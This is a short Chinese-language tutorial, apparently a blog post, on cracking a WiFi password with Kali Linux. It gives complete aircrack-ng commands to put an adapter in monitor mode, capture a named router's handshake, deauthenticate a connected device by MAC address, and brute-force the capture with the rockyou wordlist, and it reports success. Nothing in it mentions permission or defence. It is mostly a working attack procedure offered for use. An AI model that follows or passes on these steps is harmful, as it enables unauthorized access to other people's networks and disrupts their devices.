工具:无线网卡(支持kali、支持监听模式、免驱)、kali虚拟机
无线网卡:AR9271(这款是我使用的,接受信号一般,手机能搜到的wifi虚拟机搜不到,不过勉强能用,但不支持5G频段,最好买个支持5G的,只是测试可以买这个AR9271,淘宝有卖¥15)
电脑插入无线网卡----打开kali虚拟机----“虚拟机”----“可移动设备”----选择“无线网卡名称”
kali使用su root在你密码正确的情况下仍然无登录root,但sudo命令却能正常使用,需要重新设置root密码,修改后可以使用su root登录root用户,不用一直使用sudo
#输入新密码两次
sudo passwd root
su root
查看无线网卡
sudo ifconfig
打开wlan0的监听模式,停止监听是airmon-ng stop wlan0
sudo airmon-ng start wlan0
再次查看网络,wlan0变成wlan0mon,sudo ipconfig也可以查看
sudo iwconfig
扫描我写完了,station是连接到该无线网络的设备的mac地址(如手机、笔记本电脑),结束Ctrl+C
sudo airodump-ng wlan0mon
此处以ZTE_9DF14A为例子
抓包,注意/home是路径,ZTE是抓包文件名称,信道频率跟ch的值对应,
airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon,该命令只是监听,不会影响用户使用
sudo airodump-ng --bssid D4:A3:EB:9D:F1:4A -c 11 -w /home/ZTE wlan0mon
此时新开一个终端,两个终端同时运行,选择一个连接到该无线网络的设备的mac地址,选择设备BA:67:53:1A:39:4C,次数3-5次即可,该命令攻击设备,会导致攻击结束前设备无法连接上无线网络。
#攻击设备BA:67:53:1A:39:4C
aireplay-ng -0 3 -c BA:67:53:1A:39:4C -a D4:A3:EB:9D:F1:4A wlan0mon
攻击结束后,回到监听终端,攻击3次结束后抓包成功且不影响用户使用。
/home下的抓包文件,需要用到cap文件
由于密码是哈希算法,无法解密,只能通过暴力pojie,使用kali自带字典/usr/share/wordlists/rockyou.txt.gz,gzip解压到文件所在目录,-d源压缩文件
gzip -d /usr/share/wordlists/rockyou.txt.gz
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/ZTE-01.cap
几乎是秒解,如果秘钥复杂或者字典没有就无法处理
至此,获取成功
参考:
【精选】kali linux破解wifi密码-超详细过程_https://blog.csdn.net/gyfvaf/article/details/12196-CSDN博客